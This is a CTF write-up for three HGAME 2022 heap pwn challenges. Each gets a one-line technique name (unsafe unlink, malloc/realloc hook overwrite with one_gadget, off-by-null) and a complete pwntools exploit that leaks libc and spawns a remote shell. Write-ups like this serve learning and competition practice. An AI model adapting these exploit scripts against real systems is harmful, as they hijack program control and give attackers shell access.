HGAME 2022 Week3 Pwn
三个最简单的堆模板题,真是一周比一周简单了......
changeable_note
unsafe unlink
模板题,当然用其他方法也能做。(感谢狒猩橙写的exp)
from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'
s = remote('chuj.top',52533)
# s = process('./note')
libc = ELF('./libc-2.23.so')
elf = ELF('./note')
def getYZM(s64):
assert len(s64)==64
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
s64=s64.decode()
for i in table:
for j in table:
for k in table:
for l in table:
st=(i+j+k+l).encode()
if sha256(st).hexdigest()==s64:
return st
def add(index,size,content):
s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(index))
s.sendlineafter(b'>> ' , str(size))
s.sendafter(b'>> ' , content)
def edit(index,content):
s.sendlineafter(b'>> ' , b'2')
s.sendlineafter(b'>> ' , str(index))
s.sendline(content)
def delete(index):
s.sendlineafter(b'>> ' , b'3')
s.sendlineafter(b'>> ' , str(index))
note_addr = 0x4040C0
fd = note_addr - 0x18
bk = note_addr - 0x10
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']
sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))
add(0 , 0x30 , b'a')
add(1 , 0xf0 , b'a')
add(2 , 0x30 , b'/bin/sh\x00')
add(3 , 0x30 , b'a')
payload = p64(0) + p64(0x31) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x100)
edit(0 , payload)
delete(1)
edit(0 , b'a'*0x18 + p64(atoi_got) + p64(free_got) + p64(atoi_got))
edit(1 , p32(puts_plt) + b'\x00')
delete(0)
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
edit(2 ,p64(system_addr))
s.sendline(b"/bin/sh\x00")
s.interactive()
elder_note
__realloc_hook
配合__malloc_hook
调整栈帧,打one_gadget
。(感谢狒猩橙写的exp)
from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'
s = remote('chuj.top',52703)
libc = ELF('./libc-2.23.so')
elf = ELF('./note')
def getYZM(s64):
assert len(s64)==64
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
s64=s64.decode()
for i in table:
for j in table:
for k in table:
for l in table:
st=(i+j+k+l).encode()
if sha256(st).hexdigest()==s64:
return st
def add(index,size,content):
s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(index))
s.sendlineafter(b'>> ' , str(size))
s.sendafter(b'>> ' , content)
def show(index):
s.sendlineafter(b'>> ' , b'2')
s.sendlineafter(b'>> ' , str(index))
def delete(index):
s.sendlineafter(b'>> ' , b'3')
s.sendlineafter(b'>> ' , str(index))
sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))
add(0 , 0x60 , b'a')
add(1 , 0x60 , b'a')
add(2 , 0x80 , b'a')
add(3 , 0x60 , b'a')
delete(2)
show(2)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
onegadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + onegadget[1]
success('libc_base=>' + hex(libc_base))
delete(0)
delete(1)
delete(0)
add(0 , 0x60 , p64(__malloc_hook-0x23))
add(1 , 0x60 , b'a')
add(4 , 0x60 , b'a')
add(5 , 0x60 , b'a'*0xb + p64(one_gadget) + p64(realloc))
s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(8))
s.sendlineafter(b'>> ' , str(32))
s.interactive()
sized_note
off by null
模板水题,随便写写就行了。
from pwn import *
import string
from hashlib import sha256
context(arch = 'amd64', os = 'linux', log_level = 'debug')
#io = process("./note")
io = remote("chuj.top", 52838)
#libc = ELF("./libc-2.27.so")
libc = ELF("./libc.so.6")
table = string.digits + string.ascii_letters
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)
prefix = ""
f = 0
for a in table:
for b in table:
for c in table:
for d in table:
sha = (a + b + c + d).encode()
if sha256(sha).hexdigest() == tar:
prefix = a + b + c + d
f = 1
break
if f == 1 :
break
if f == 1 :
break
if f == 1 :
break
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())
def add(index, size, content):
io.sendlineafter(">> ", b'1')
io.sendlineafter(">> ", str(index))
io.sendlineafter(">> ", str(size))
io.sendafter(">> ", content)
def show(index):
io.sendlineafter(">> ", b'2')
io.sendlineafter(">> ", str(index))
def delete(index):
io.sendlineafter(">> ", b'3')
io.sendlineafter(">> ", str(index))
def edit(index, content):
io.sendlineafter(">> ", b'4')
io.sendlineafter(">> ", str(index))
io.send(content)
def quit():
io.sendlineafter(">> ", b'5')
if __name__ == '__main__':
for i in range(8):
add(i, 0xf0, b'\n')
add(8, 0x50, b'\n')
add(9, 0x50, b'\n')
add(10, 0x28, b'\n')
add(11, 0xf0, b'\n')
add(12, 0x20, b'\n')
for i in range(7):
delete(i)
edit(10, b'a'*0x20 + p64(0x1f0))
delete(7)
delete(11)
add(11, 0x100, b'\n')
add(12, 0x40, b'\n')
show(9)
libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success("libc_base:\t" + hex(libc.address))
add(13, 0x50, b'\n')
delete(9)
edit(13, p64(libc.sym['__free_hook'] - 8))
add(14, 0x50, b'\n')
add(15, 0x50, b'/bin/sh\x00' + p64(libc.sym['system']))
delete(15)
io.interactive()